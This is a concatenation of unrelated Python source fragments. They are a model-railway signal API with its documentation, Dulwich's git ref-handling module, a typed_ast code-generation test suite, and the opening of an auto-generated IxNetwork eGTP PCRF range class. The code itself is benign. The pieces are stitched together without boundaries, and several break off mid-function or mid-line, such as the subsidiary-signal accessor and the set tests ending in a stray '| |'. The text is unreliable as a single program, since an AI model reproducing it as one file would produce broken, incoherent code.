if not os.path.isdir(web_dir):
raise
if config.evolve_all and isinstance(config.evolve_all, str):
# the signal on the canvas (in pixels)
# Optional Parameters:
# orientation:int- Orientation in degrees (0 or 180) - Default is zero
# sig_callback:name - Function to call when a signal event happens - Default is no callback
# Note that the callback function returns (item_id, callback type)
# sig_passed_button:bool - Creates a "signal Passed" button for automatic control - Default False
# shunt_ahead:bool - Specifies a shunt ahead signal (yellow banner) - default False (red banner)
#
# set_route - Set (and change) the route indication (either feathers or theatre text)
# Mandatory Parameters:
# sig_id:int - The ID for the signal
# Optional Parameters:
# route:signals_common.route_type - MAIN, LH1, LH2, RH1 or RH2 - default 'NONE'
# theatre_text:str - The text to display in the theatre route indicator - default "NONE"
#
# update_signal - update the signal aspect based on the aspect of a signal ahead - Primarily
# intended for 3/4 aspect colour light signals but can also be used to update
# 2-aspect distant signals (semaphore or colour light) on the home signal ahead
# Mandatory Parameters:
# sig_id:int - The ID for the signal
# Optional Parameters:
# sig_ahead_id:int/str - The ID for the signal "ahead" of the one we want to update.
# Either an integer representing the ID of the signal created on our schematic,
# or a string representing the identifier of an signal on an external host/node
# (subscribed to via the MQTT Interface - refer to the section on MQTT interfacing)
# Default = "None" (no signal ahead to take into account when updating the signal)
#
# toggle_signal(sig_id) - to support route setting (use 'signal_clear' to find the switched state )
#
# toggle_subsidary(sig_id) - to support route setting (use 'subsidary_clear' to find the switched state)
#
# lock_signal(*sig_id) - for point/signal interlocking (multiple Signal_IDs can be specified)
#
# unlock_signal(*sig_id) - for point/signal interlocking (multiple Signal_IDs can be specified)
#
# lock_subsidary(*sig_id) - for point/signal interlocking (multiple Signal_IDs can be specified)
#
# unlock_subsidary(*sig_id) - for point/signal interlocking (multiple Signal_IDs can be specified)
#
# signal_clear(sig_id) - returns the SWITCHED state of the signal - i.e the state of the signal button
# (True='OFF') - use for external point/signal interlocking functions
#
# subsidary_clear(sig_id) - returns the SWITCHED state of the subsidary - i.e the state of the subsidary
# button (True='OFF') - use for external point/signal interlocking functions
#
# signal_state(sig_id) - returns the DISPLAYED state of the signal - This can be different to the SWITCHED
# state of the signal if the signal is OVERRIDDEN or subject to APPROACH CONTROL
# Use this function when you need to get the actual state (in terms of aspect)
# that the signal is displaying - returns 'signal_state_type' (see above)
#
# set_signal_override (sig_id*) - Overrides the signal to DANGER (can specify multiple sig_ids)
#
# clear_signal_override (sig_id*) - Reverts signal to the non-overridden state (can specify multiple sig_ids)
#
# signal_overridden (sig_id) - returns the signal override state (True='overridden')
# Function DEPRECATED (will be removed from future releases) - use signal_state instead
#
# trigger_timed_signal - Sets the signal to DANGER and then cycles through the aspects back to PROCEED
# - If a start delay > 0 is specified then a 'sig_passed' callback event is generated
# - when the signal is changed to DANGER - For each subsequent aspect change (all the
# - way back to PROCEED) a 'sig_updated' callback event will be generated
# Mandatory Parameters:
# sig_id:int - The ID for the signal
# Optional Parameters:
# start_delay:int - Delay (in seconds) before changing to DANGER (default=5)
# time_delay:int - Delay (in seconds) for cycling through the aspects (default=5)
#
# set_approach_control - Used when a diverging route has a lower speed restriction to the main line
# Puts the signal into "Approach Control" Mode where the signal will display a more
# restrictive aspect/state (either DANGER or CAUTION) to approaching trains. As the
# Train approaches, the signal will then be "released" to display its "normal" aspect.
# When a signal is in "approach control" mode the signals behind will display the
# appropriate aspects (when updated based on the signal ahead). These would be the
# normal aspects for "Release on Red" but for "Release on Yellow", the signals behind
# would display flashing yellow and flashing double yellow (assuming 4 aspect signals)
# Mandatory Parameters:
# sig_id:int - The ID for the signal
# Optional Parameters:
# release_on_yellow:Bool - True = Yellow Approach aspect, False = Red Approach aspect (default=False)
#
# clear_approach_control - This "releases" the signal to display the normal aspect and should be called when
# a train is approaching the signal. Note that signals can also be released when the
# "release button" (displayed just in front of the signal if specified when the signal
# was created) is activated - manually or via an external sensor event
# Mandatory Parameters:
# sig_id:int - The ID for the signal
#
# approach_control_set (sig_id) - returns if the signal is subject to approach control (True='active')
# Function DEPRECATED (will be removed from future releases) - use signal_state instead
#
# -------------------------------------------------------------------------
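# A brief usage sketch of the API documented above. The signal IDs, route choice and
# delays are illustrative assumptions only - they are not values defined in this module.
#
#   set_route(1, route=signals_common.route_type.LH1)      # set the feather/theatre indication
#   update_signal(1, sig_ahead_id=2)                        # cascade the aspect from the signal ahead
#   set_approach_control(1, release_on_yellow=False)        # hold approaching trains ("Release on Red")
#   if signal_clear(1) and subsidary_clear(1):              # SWITCHED state - for interlocking logic
#       pass
#   displayed = signal_state(1)                             # DISPLAYED state (signal_state_type)
#   trigger_timed_signal(1, start_delay=0, time_delay=5)    # cycle back through the aspects
# -------------------------------------------------------------------------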
from . import signals_common
from . import signals_colour_lights
from . import signals_ground_position
from . import signals_ground_disc
from . import signals_semaphores
from typing import Union
from tkinter import *
import logging
# -------------------------------------------------------------------------
# Externally called function to Return the current SWITCHED state of the signal
# (i.e. the state of the signal button - Used to enable interlocking functions)
# Note that the DISPLAYED state of the signal may not be CLEAR if the signal is
# overridden or subject to release on RED - See "signal_displaying_clear"
# Function applicable to ALL signal types created on the local schematic
# Function does not support REMOTE Signals (with a compound Sig-ID)
# -------------------------------------------------------------------------
def signal_clear (sig_id:int):
global logging
# Validate the signal exists
if not signals_common.sig_exists(sig_id):
logging.error ("Signal "+str(sig_id)+": signal_clear - Signal does not exist")
sig_clear = False
else:
sig_clear = signals_common.signals[str(sig_id)]["sigclear"]
return (sig_clear)
# -------------------------------------------------------------------------
# Externally called function to Return the displayed state of the signal
# (i.e. whether the signal is actually displaying a CLEAR aspect). Note that
# this can be different to the state the signal has been manually set to (via
# the signal button) - as it could be overridden or subject to Release on Red
# Function applicable to ALL signal types - Including REMOTE SIGNALS
# -------------------------------------------------------------------------
def signal_state (sig_id:Union[int,str]):
global logging
# Validate the signal exists
if not signals_common.sig_exists(sig_id):
logging.error ("Signal "+str(sig_id)+": signal_state - Signal does not exist")
sig_state = signals_common.signal_state_type.DANGER
else:
sig_state = signals_common.signals[str(sig_id)]["sigstate"]
return (sig_state)
# -------------------------------------------------------------------------
# ##### DEPRECATED ##### DEPRECATED ##### DEPRECATED ##### DEPRECATED #####
# Externally called function to Return the current state of the signal override
# Function applicable to ALL signal types created on the local schematic
# Function does not support REMOTE Signals (with a compound Sig-ID)
# -------------------------------------------------------------------------
def signal_overridden (sig_id:int):
global logging
# Validate the signal exists
logging.warning ("Signal "+str(sig_id)+": signal_overridden - This function is DEPRECATED")
if not signals_common.sig_exists(sig_id):
logging.error ("Signal "+str(sig_id)+": signal_overridden - Signal does not exist")
sig_overridden = False
else:
sig_overridden = signals_common.signals[str(sig_id)]["override"]
return (sig_overridden)
# -------------------------------------------------------------------------
# ##### DEPRECATED ##### DEPRECATED ##### DEPRECATED ##### DEPRECATED #####
# Externally called function to Return the current state of the approach control
# Function applicable to ALL signal types created on the local schematic
# (will return False if the particular signal type not supported)
# Function does not support REMOTE Signals (with a compound Sig-ID)
# -------------------------------------------------------------------------
def approach_control_set (sig_id:int):
global logging
logging.warning ("Signal "+str(sig_id)+": approach_control_set - This function is DEPRECATED")
# Validate the signal exists
if not signals_common.sig_exists(sig_id):
logging.error ("Signal "+str(sig_id)+": approach_control_set - Signal does not exist")
approach_control_active = False
# get the signal state to return - only supported for semaphores and colour_lights
elif (signals_common.signals[str(sig_id)]["sigtype"] in
(signals_common.sig_type.colour_light, signals_common.sig_type.semaphore)):
approach_control_active = (signals_common.signals[str(sig_id)]["releaseonred"]
or signals_common.signals[str(sig_id)]["releaseonyel"])
else:
approach_control_active = False
return (approach_control_active)
# -------------------------------------------------------------------------
# Externally called function to Return the current state of the subsidary
# signal - if the signal does not have one then the return will be FALSE
# Function applicable to ALL signal types created on the local schematic
# Function does not support REMOTE Signals (with a compound Sig-ID)
# -------------------------------------------------------------------------
def subsidary_clear (sig_id:int):
global logging
# Validate the signal exists
# refs.py -- For dealing with git refs
# Copyright (C) 2008-2013 <NAME> <<EMAIL>>
#
# Dulwich is dual-licensed under the Apache License, Version 2.0 and the GNU
# General Public License as public by the Free Software Foundation; version 2.0
# or (at your option) any later version. You can redistribute it and/or
# modify it under the terms of either of these two licenses.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# You should have received a copy of the licenses; if not, see
# <http://www.gnu.org/licenses/> for a copy of the GNU General Public License
# and <http://www.apache.org/licenses/LICENSE-2.0> for a copy of the Apache
# License, Version 2.0.
#
"""Ref handling.
"""
import errno
import os
import sys
from dulwich.errors import (
PackedRefsException,
RefFormatError,
)
from dulwich.objects import (
git_line,
valid_hexsha,
ZERO_SHA,
)
from dulwich.file import (
GitFile,
ensure_dir_exists,
)
SYMREF = b'ref: '
LOCAL_BRANCH_PREFIX = b'refs/heads/'
BAD_REF_CHARS = set(b'\177 ~^:?*[')
ANNOTATED_TAG_SUFFIX = b'^{}'
def parse_symref_value(contents):
"""Parse a symref value.
:param contents: Contents to parse
:return: Destination
"""
if contents.startswith(SYMREF):
return contents[len(SYMREF):].rstrip(b'\r\n')
raise ValueError(contents)
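# Illustrative behaviour (the refname is an example value):
# >>> parse_symref_value(b'ref: refs/heads/master\n')
# b'refs/heads/master'
# >>> parse_symref_value(b'aa' * 20)    # not a symref -> ValueError
# Traceback (most recent call last):
#     ...
# ValueError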
def check_ref_format(refname):
"""Check if a refname is correctly formatted.
Implements all the same rules as git-check-ref-format[1].
[1]
http://www.kernel.org/pub/software/scm/git/docs/git-check-ref-format.html
:param refname: The refname to check
:return: True if refname is valid, False otherwise
"""
# These could be combined into one big expression, but are listed
# separately to parallel [1].
if b'/.' in refname or refname.startswith(b'.'):
return False
if b'/' not in refname:
return False
if b'..' in refname:
return False
for i, c in enumerate(refname):
if ord(refname[i:i+1]) < 0o40 or c in BAD_REF_CHARS:
return False
if refname[-1] in b'/.':
return False
if refname.endswith(b'.lock'):
return False
if b'@{' in refname:
return False
if b'\\' in refname:
return False
return True
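# Illustrative behaviour (refnames are example values):
# >>> check_ref_format(b'heads/master')
# True
# >>> check_ref_format(b'master')           # no '/' component
# False
# >>> check_ref_format(b'heads/foo.lock')   # forbidden '.lock' suffix
# False
# >>> check_ref_format(b'heads/..evil')     # '/.' and '..' are rejected
# False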
class RefsContainer(object):
"""A container for refs."""
def set_symbolic_ref(self, name, other):
"""Make a ref point at another ref.
:param name: Name of the ref to set
:param other: Name of the ref to point at
"""
raise NotImplementedError(self.set_symbolic_ref)
def get_packed_refs(self):
"""Get contents of the packed-refs file.
:return: Dictionary mapping ref names to SHA1s
:note: Will return an empty dictionary when no packed-refs file is
present.
"""
raise NotImplementedError(self.get_packed_refs)
def get_peeled(self, name):
"""Return the cached peeled value of a ref, if available.
:param name: Name of the ref to peel
        :return: The peeled value of the ref. If the ref is known not to point to
a tag, this will be the SHA the ref refers to. If the ref may point
to a tag, but no cached information is available, None is returned.
"""
return None
def import_refs(self, base, other):
for name, value in other.items():
self[b'/'.join((base, name))] = value
def allkeys(self):
"""All refs present in this container."""
raise NotImplementedError(self.allkeys)
def keys(self, base=None):
"""Refs present in this container.
:param base: An optional base to return refs under.
:return: An unsorted set of valid refs in this container, including
packed refs.
"""
if base is not None:
return self.subkeys(base)
else:
return self.allkeys()
def subkeys(self, base):
"""Refs present in this container under a base.
:param base: The base to return refs under.
:return: A set of valid refs in this container under the base; the base
prefix is stripped from the ref names returned.
"""
keys = set()
base_len = len(base) + 1
for refname in self.allkeys():
if refname.startswith(base):
keys.add(refname[base_len:])
return keys
def as_dict(self, base=None):
"""Return the contents of this container as a dictionary.
"""
ret = {}
keys = self.keys(base)
if base is None:
base = b''
else:
base = base.rstrip(b'/')
for key in keys:
try:
ret[key] = self[(base + b'/' + key).strip(b'/')]
except KeyError:
continue # Unable to resolve
return ret
def _check_refname(self, name):
"""Ensure a refname is valid and lives in refs or is HEAD.
HEAD is not a valid refname according to git-check-ref-format, but this
class needs to be able to touch HEAD. Also, check_ref_format expects
refnames without the leading 'refs/', but this class requires that
so it cannot touch anything outside the refs dir (or HEAD).
:param name: The name of the reference.
:raises KeyError: if a refname is not HEAD or is otherwise not valid.
"""
if name in (b'HEAD', b'refs/stash'):
return
if not name.startswith(b'refs/') or not check_ref_format(name[5:]):
raise RefFormatError(name)
def read_ref(self, refname):
"""Read a reference without following any references.
:param refname: The name of the reference
:return: The contents of the ref file, or None if it does
not exist.
"""
contents = self.read_loose_ref(refname)
if not contents:
contents = self.get_packed_refs().get(refname, None)
return contents
def read_loose_ref(self, name):
"""Read a loose reference and return its contents.
:param name: the refname to read
:return: The contents of the ref file, or None if it does
not exist.
"""
raise NotImplementedError(self.read_loose_ref)
def follow(self, name):
"""Follow a reference name.
        :return: a tuple of (refnames, sha), where refnames are the names of
references in the chain
"""
contents = SYMREF + name
depth = 0
refnames = []
while contents.startswith(SYMREF):
refname = contents[len(SYMREF):]
refnames.append(refname)
contents = self.read_ref(refname)
if not contents:
break
depth += 1
if depth > 5:
raise KeyError(name)
return refnames, contents
def _follow(self, name):
import warnings
warnings.warn(
"RefsContainer._follow is deprecated. Use RefsContainer.follow "
"instead.", DeprecationWarning)
refnames, contents = self.follow(name)
if not refnames:
return (None, contents)
return (refnames[-1], contents)
def __contains__(self, refname):
if self.read_ref(refname):
return True
return False
def __getitem__(self, name):
"""Get the SHA1 for a reference name.
This method follows all symbolic references.
"""
_, sha = self.follow(name)
if sha is None:
raise KeyError(name)
return sha
def set_if_equals(self, name, old_ref, new_ref):
"""Set a refname to new_ref only if it currently equals old_ref.
This method follows all symbolic references if applicable for the
subclass, and can be used to perform an atomic compare-and-swap
operation.
:param name: The refname to set.
:param old_ref: The old sha the refname must refer to, or None to set
unconditionally.
:param new_ref: The new sha the refname will refer to.
:return: True if the set was successful, False otherwise.
"""
raise NotImplementedError(self.set_if_equals)
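    # Illustrative compare-and-swap usage (refs, old_sha and new_sha are placeholders):
    # >>> refs.set_if_equals(b'refs/heads/master', old_sha, new_sha)
    # True    # only if the ref still pointed at old_sha; pass old_ref=None to set unconditionally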
def add_if_new(self, name, ref):
"""Add a new reference only if it does not already exist."""
raise NotImplementedError(self.add_if_new)
def __setitem__(self, name, ref):
"""Set a reference name to point to the given SHA1.
This method follows all symbolic references if applicable for the
subclass.
:note: This method unconditionally overwrites the contents of a
reference. To update atomically only if the reference has not
changed, use set_if_equals().
:param name: The refname to set.
:param ref: The new sha the refname will refer to.
"""
self.set_if_equals(name, None, ref)
def remove_if_equals(self, name, old_ref):
"""Remove a refname only if it currently equals old_ref.
This method does not follow symbolic references, even if applicable for
the subclass. It can be used to perform an atomic compare-and-delete
operation.
:param name: The refname to delete.
:param old_ref: The old sha the refname must refer to, or None to
delete unconditionally.
:return: True if the delete was successful, False otherwise.
"""
raise NotImplementedError(self.remove_if_equals)
def __delitem__(self, name):
"""Remove a refname.
This method does not follow symbolic references, even if applicable for
the subclass.
:note: This method unconditionally deletes the contents of a reference.
To delete atomically only if the reference has not changed, use
remove_if_equals().
:param name: The refname to delete.
"""
self.remove_if_equals(name, None)
def get_symrefs(self):
"""Get a dict with all symrefs in this container.
:return: Dictionary mapping source ref to target ref
"""
ret = {}
for src in self.allkeys():
try:
dst = parse_symref_value(self.read_ref(src))
except ValueError:
pass
else:
ret[src] = dst
return ret
class DictRefsContainer(RefsContainer):
"""RefsContainer backed by a simple dict.
This container does not support symbolic or packed references and is not
threadsafe.
"""
def __init__(self, refs):
self._refs = refs
self._peeled = {}
def allkeys(self):
return self._refs.keys()
def read_loose_ref(self, name):
return self._refs.get(name, None)
def get_packed_refs(self):
return {}
def set_symbolic_ref(self, name, other):
self._refs[name] = SYMREF + other
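    # A small usage sketch (the 40-character sha is an illustrative placeholder):
    # >>> refs = DictRefsContainer({b'refs/heads/master': b'aa' * 20})
    # >>> refs.set_symbolic_ref(b'HEAD', b'refs/heads/master')
    # >>> refs.follow(b'HEAD')
    # ([b'HEAD', b'refs/heads/master'], b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
    # >>> refs[b'HEAD'] == refs[b'refs/heads/master']
    # True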
# -*- coding: utf-8 -*-
import unittest
from typed_ast import ast27
class TestCodeGen27(unittest.TestCase):
def setUp(self):
from gen27 import CodeGen27
self.gen = CodeGen27()
def regen(s):
return self.gen.generate(ast27.parse(s), 0)
self.regen = regen
def test_module_docstring(self):
cases = [
'',
'"""doc string"""',
'''"""
doc string
"""''',
'b"""a"""',
'u"""あ"""',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_assert(self):
cases = [
'assert True',
"assert True, 'assert true'",
"""def f():
assert False, 'テスト'"""
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_assign(self):
cases = [
'a = 1',
'a = b = 1',
'a = 2 # type: int',
'a = b = 2 # type: int',
"""def f():
a = 1""",
'a, b = l',
'a, (b, c) = l',
'[a] = b = l',
'[a, (b, [c, (d,)])] = l',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_break_continue(self):
cases = [
"""for i in l:
break""",
"""for i in l:
continue""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_aug_assign(self):
cases = [
'b += 1',
'b -= 1',
'b *= 1',
'b /= 1',
'b //= 1',
'b %= 1',
'b **= 1',
'b >>= 1',
'b <<= 1',
'b &= 1',
'b ^= 1',
'b |= 1',
"""def f():
a += 1""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_class_def(self):
cases = [
"""class A:
pass""",
"""class A(object):
a = 1""",
"""@deco
class A(B, C):
@deco_out
@deco_iin
class D:
def f(self):
pass""",
'''class A:
"""
doc string
"""''',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_delete(self):
cases = [
'del a',
'del a, b',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_exec(self):
cases = [
"exec '1'",
"exec 'a = 1' in globals()",
"exec 'a = 1' in globals(), locals()",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_for(self):
cases = [
"""for i in l:
pass""",
"""for i, j in l:
pass""",
"""for i, (j, k) in l:
pass""",
"""for i in l: # type: int
for j in ll: # type: long
pass""",
"""for i in l:
a += i
else:
pass""",
"""for i in l:
for j in ll:
a += j
else:
a += i
else:
pass""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_function_def(self):
cases = [
"""def f():
pass""",
"""def f(a):
pass""",
"""def f(a, b):
pass""",
"""def f(a=1):
pass""",
"""def f(a=1, b=2):
pass""",
"""def f(a, b, c=1, d=2):
pass""",
"""def f(*args):
pass""",
"""def f(a, *args):
pass""",
"""def f(a=1, *args):
pass""",
"""def f(a, b, c=1, d=2, *args):
pass""",
"""def f(**kw):
pass""",
"""def f(a, **kw):
pass""",
"""def f(a=1, **kw):
pass""",
"""def f(a, b, c=1, d=2, **kw):
pass""",
"""def f(*args, **kw):
pass""",
"""def f(a, *args, **kw):
pass""",
"""def f(a=1, *args, **kw):
pass""",
"""def f(a, b, c=1, d=2, *args, **kw):
pass""",
"""def f(): # type: () -> int
return 1""",
"""def f(
a, # type: int
b,
c, # type: float
*d # type: list
): # type: None
pass""",
"""@deco
def f():
pass""",
"""@outer
@inner(a, b=1)
def f():
pass""",
'''def f():
"""abc"""
a = b = c = 1''',
'''def f():
"""
a
b
c
"""
pass''',
"""def f():
def g():
def h():
pass"""
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_global(self):
cases = [
"""def f():
global a
a = 1""",
"""def f():
global a, b, c
a = b = c = 1"""
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_if(self):
cases = [
"""if a:
pass""",
"""if a:
a = 1
else:
pass""",
"""if a:
a = 1
elif b:
pass""",
"""if a:
a = 1
elif b:
b = 1
else:
pass""",
"""if a:
if b:
if c:
c = 1
elif d:
d = 1
elif e:
e = 1""",
"""def f():
if a:
pass""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_import(self):
cases = [
'import a',
'import a.b',
'import a as aa',
'import a.b as aa',
'import a, b',
'import a as aa, b',
'import a as aa, b as bb',
'from a import b',
'from a import b, c',
'from a import b as bb',
'from a import b as bb, c',
'from a import b, c',
'from . import b',
'from .a import b',
'from a.b import c',
'from ....a import b',
'from ....a import b',
'from ..a.b.c import d',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_print(self):
cases = [
'print',
'print a',
'print a,',
'print a, b',
'print>>sys.stderr, a',
'print>>sys.stderr, a,',
'print>>sys.stderr, a, b',
"""def f():
print""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_raise(self):
cases = [
'raise',
'raise TypeError',
'raise Exception(a)',
'raise Exception, a',
'raise Exception, a, tb',
"""def f():
raise ValueError""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_return(self):
cases = [
"""def f():
return""",
"""def f():
return a""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_try(self):
cases = [
"""try:
a = 1
except:
b = 2""",
"""try:
pass
except ValueError:
pass""",
"""try:
pass
except ValueError as e:
pass""",
"""try:
pass
except (ValueError, TypeError) as e:
pass""",
"""try:
pass
except ValueError:
pass
except TypeError:
pass""",
"""try:
pass
finally:
pass""",
"""try:
pass
except Exception:
pass
finally:
pass""",
"""try:
try:
a = 1
except:
b = 2
finally:
c = 3
except:
pass
finally:
pass""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_while(self):
cases = [
"""while True:
pass""",
"""while True:
break
else:
pass""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_with(self):
cases = [
"""with aa:
pass""",
"""with open('a.txt') as f:
pass""",
]
for c in cases:
self.assertEqual(c, self.regen(c))
neq_cases = [
(
"""with aa as a, bb as b:
pass""",
"""with aa as a:
with bb as b:
pass"""),
]
for origin, exact in neq_cases:
self.assertEqual(exact, self.regen(origin))
def test_call(self):
cases = [
'f()',
'f(1)',
'f(1, 2)',
'f(1, 2, 3)',
'f(a=1)',
'f(a=1, b=2)',
'f(*l)',
'f(**k)',
'f(1, 2, a=1, b=2)',
'f(1, a=2, *l, **k)',
'(f + h)()',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_compare(self):
cases = [
'1 < 2 > 3 == 4 != 5',
'a <= b >= c',
'a is None',
'a is not None',
'a in l not in ll',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_dict(self):
cases = [
'{}',
'{1: 10}',
"""{
1: 10,
2: 20,
}""",
"""def f():
a = {
b: c,
d: e,
}""",
'{i: i * i for i in a}',
'{i: i * i for i in a if i}',
'{i: i * i for i in a if i if i < 10}',
'{i: i * j for i in a if i if i < 10 for j in b if j * 10}',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_generator_exp(self):
cases = [
'(i * j for i in l)',
'(i * j for i in l if i > 10)',
'(i * j for i in l for j in ll)',
'(i * j for i in l if i < 2 for j in ll if j if j < 10)',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_lambda(self):
cases = [
'lambda: 1',
'lambda x: x + 1',
'lambda x, y: x * y',
'lambda x, y=1: x / y',
'lambda x, y=1, *z: x / y + sum(z)',
'lambda x: lambda y: x ^ y',
'(lambda x: x) + f',
'f | (lambda x: x)',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_list(self):
cases = [
'[]',
'[1]',
"""[
1,
2,
]""",
'[a, b, c] = l',
'[i for i in l]',
'[i * j for i in l if i for j in ll if j]',
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_repr(self):
cases = [
'`1`',
'`1 + 2`',
"`1 + 2` + '3'",
]
for c in cases:
self.assertEqual(c, self.regen(c))
def test_set(self):
cases = [
'{1}',
'{1, 2, 3}',
"""def f():
a = {
1,
2,
3,
4,
}""",
'{i ** 2 for i in a}',
'{i ** 2 for i in a if i < 10}',
'{i ** 2 for i | |
# ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/egtppcrfs5s8range_d7b3bdabbe4bfdf7e1a28233c37db008.py
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class EgtpPcrfS5S8Range(Base):
"""PCRF Range
The EgtpPcrfS5S8Range class encapsulates a required egtpPcrfS5S8Range resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'egtpPcrfS5S8Range'
_SDM_ATT_MAP = {
'Apn': 'apn',
'Apn_AMBRD': 'apn_AMBRD',
'Apn_AMBRU': 'apn_AMBRU',
'Db_gbrd': 'db_gbrd',
'Db_gbru': 'db_gbru',
'Db_mbrd': 'db_mbrd',
'Db_mbru': 'db_mbru',
'Db_pci': 'db_pci',
'Db_pl': 'db_pl',
'Db_pvi': 'db_pvi',
'Db_qci': 'db_qci',
'DefaultBearerLifetimeTimer': 'defaultBearerLifetimeTimer',
'EnableDefaultBearerLifetime': 'enableDefaultBearerLifetime',
'EnableNIDBCreationDelay': 'enableNIDBCreationDelay',
'Enabled': 'enabled',
'IMSI': 'iMSI',
'Ims_apn': 'ims_apn',
'IpType': 'ipType',
'Name': 'name',
'NidbCreationDelay': 'nidbCreationDelay',
'ObjectId': 'objectId',
'ParentPgw': 'parentPgw',
'PoolSize': 'poolSize',
'PoolStartIPv4': 'poolStartIPv4',
'PoolStartIPv6': 'poolStartIPv6',
'PoolStartIp': 'poolStartIp',
'RoundRobinDistribution': 'roundRobinDistribution',
'TotalCount': 'totalCount',
'UserPlaneIPv4Address': 'userPlaneIPv4Address',
'UserPlaneIPv6Address': 'userPlaneIPv6Address',
'UserPlaneIpAddress': 'userPlaneIpAddress',
'UserPlaneIpCount': 'userPlaneIpCount',
}
def __init__(self, parent):
super(EgtpPcrfS5S8Range, self).__init__(parent)
@property
def DedicatedBearersS5S8Pgw(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocolstack.dedicatedbearerss5s8pgw_895ed4fe0bf5aa63ce27cad2c79291aa.DedicatedBearersS5S8Pgw): An instance of the DedicatedBearersS5S8Pgw class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocolstack.dedicatedbearerss5s8pgw_895ed4fe0bf5aa63ce27cad2c79291aa import DedicatedBearersS5S8Pgw
return DedicatedBearersS5S8Pgw(self)
@property
def TrafficProfileProxiesS5S8Pgw(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocolstack.trafficprofileproxiess5s8pgw_e4ed9c77e8660dfdebbdb4de3e72c6c6.TrafficProfileProxiesS5S8Pgw): An instance of the TrafficProfileProxiesS5S8Pgw class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocolstack.trafficprofileproxiess5s8pgw_e4ed9c77e8660dfdebbdb4de3e72c6c6 import TrafficProfileProxiesS5S8Pgw
return TrafficProfileProxiesS5S8Pgw(self)
@property
def Apn(self):
"""
Returns
-------
- str: Access Point Name
"""
return self._get_attribute(self._SDM_ATT_MAP['Apn'])
@Apn.setter
def Apn(self, value):
self._set_attribute(self._SDM_ATT_MAP['Apn'], value)
@property
def Apn_AMBRD(self):
"""
Returns
-------
- number: APN aggregated maximum bit rate for downlink. For both spec versions (December '09 and December '10) this value represents kbps and the maximum value that can be encoded is 4,294,967,295 kbps.
"""
return self._get_attribute(self._SDM_ATT_MAP['Apn_AMBRD'])
@Apn_AMBRD.setter
def Apn_AMBRD(self, value):
self._set_attribute(self._SDM_ATT_MAP['Apn_AMBRD'], value)
@property
def Apn_AMBRU(self):
"""
Returns
-------
- number: APN aggregated maximum bit rate for uplink.For both spec versions (December '09 and December '10) this value represents kbps and the maximum value that can be encoded is 4,294,967,295 kbps.
"""
return self._get_attribute(self._SDM_ATT_MAP['Apn_AMBRU'])
@Apn_AMBRU.setter
def Apn_AMBRU(self, value):
self._set_attribute(self._SDM_ATT_MAP['Apn_AMBRU'], value)
@property
def Db_gbrd(self):
"""
Returns
-------
- number: Deprecated. Field is ignored. Kept for TCL BW compatibility
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_gbrd'])
@Db_gbrd.setter
def Db_gbrd(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_gbrd'], value)
@property
def Db_gbru(self):
"""
Returns
-------
- number: Deprecated. Field is ignored. Kept for TCL BW compatibility
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_gbru'])
@Db_gbru.setter
def Db_gbru(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_gbru'], value)
@property
def Db_mbrd(self):
"""
Returns
-------
- number: Maximum bitrate for downlink. For December '09 and December '10 spec versions the maximum value that can be encoded is 1,099,511,627,775 kbps.
